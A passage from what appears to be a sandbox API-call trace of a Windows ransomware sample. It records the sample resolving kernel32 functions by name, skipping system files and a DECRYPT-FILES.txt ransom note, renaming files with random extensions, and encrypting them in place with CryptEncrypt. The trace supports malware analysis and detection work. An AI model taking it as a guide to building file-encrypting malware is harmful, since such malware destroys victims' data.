lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.500] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.500] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.500] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.500] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.500] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.500] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.500] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.501] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.501] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.501] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.501] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.501] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.501] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.501] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.501] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.501] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.501] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.501] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.501] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.501] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.501] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.501] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.501] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.501] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.501] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.501] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.501] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.502] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.502] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.502] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.502] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.502] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.502] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.502] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.502] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.502] lstrlenA (lpString="DELETEATOM") returned 10 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.502] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.502] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.502] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.502] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.502] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.502] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.502] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.502] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.502] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.502] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.502] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.503] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.503] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.503] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.503] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.503] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.503] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.503] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.503] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.503] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.503] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.503] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.503] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.503] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.503] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.503] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.503] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.503] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.503] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.503] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.504] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.504] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.504] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.504] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.504] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.504] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.504] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.504] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.504] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.504] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.504] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.504] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.504] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.504] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.504] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.wFb1E8") returned 94 [0185.504] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.wFb1E8.4fiE") returned 99 [0185.504] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.wFb1E8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.wfb1e8"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.wFb1E8.4fiE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.wfb1e8.4fie"), dwFlags=0x0) returned 1 [0185.505] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.505] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.506] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.506] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaee492e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url.gutyCG", cAlternateFileName="MICROS~1.GUT")) returned 1 [0185.506] lstrcmpiW (lpString1="Microsoft At Home.url.gutyCG", lpString2="DECRYPT-FILES.txt") returned 1 [0185.506] lstrcmpiW (lpString1="Microsoft At Home.url.gutyCG", lpString2="autorun.inf") returned 1 [0185.506] lstrcmpiW (lpString1="Microsoft At Home.url.gutyCG", lpString2="boot.ini") returned 1 [0185.506] lstrcmpiW (lpString1="Microsoft At Home.url.gutyCG", lpString2="desktop.ini") returned 1 [0185.506] lstrcmpiW (lpString1="Microsoft At Home.url.gutyCG", lpString2="ntuser.dat") returned -1 [0185.506] lstrcmpiW (lpString1="Microsoft At Home.url.gutyCG", lpString2="iconcache.db") returned 1 [0185.506] lstrcmpiW (lpString1="Microsoft At Home.url.gutyCG", lpString2="bootsect.bak") returned 1 [0185.506] lstrcmpiW (lpString1="Microsoft At Home.url.gutyCG", lpString2="ntuser.dat.log") returned -1 [0185.506] lstrcmpiW (lpString1="Microsoft At Home.url.gutyCG", lpString2="thumbs.db") returned -1 [0185.506] lstrcmpiW (lpString1="Microsoft At Home.url.gutyCG", lpString2="Bootfont.bin") returned 1 [0185.506] lstrlenW (lpString="Microsoft At Home.url.gutyCG") returned 28 [0185.506] lstrcmpiW (lpString1="gutyCG", lpString2="lnk") returned -1 [0185.506] lstrcmpiW (lpString1="gutyCG", lpString2="exe") returned 1 [0185.506] lstrcmpiW (lpString1="gutyCG", lpString2="sys") returned -1 [0185.506] lstrcmpiW (lpString1="gutyCG", lpString2="dll") returned 1 [0185.506] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0185.506] lstrlenW (lpString="Microsoft At Home.url.gutyCG") returned 28 [0185.506] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0185.506] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Home.url.gutyCG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.gutyCG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.gutyCG" [0185.506] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.gutyCG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.gutycg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.507] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.507] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.507] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.507] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.507] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.507] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.508] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.508] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.508] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.508] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.509] CloseHandle (hObject=0x268) returned 1 [0185.509] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.509] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.510] CloseHandle (hObject=0x0) returned 0 [0185.510] CloseHandle (hObject=0x264) returned 1 [0185.510] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.510] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.510] GetTickCount () returned 0x11359e3 [0185.510] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.511] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.511] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.511] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.511] lstrlenA (lpString="kernel32.dll") returned 12 [0185.511] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.511] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.511] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.511] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.511] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.511] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.511] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.511] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.512] lstrlenA (lpString="ADDATOMA") returned 8 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.512] lstrlenA (lpString="ADDATOMW") returned 8 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.512] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.512] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.512] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.512] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.512] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.512] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.512] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.512] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.512] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.512] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.512] 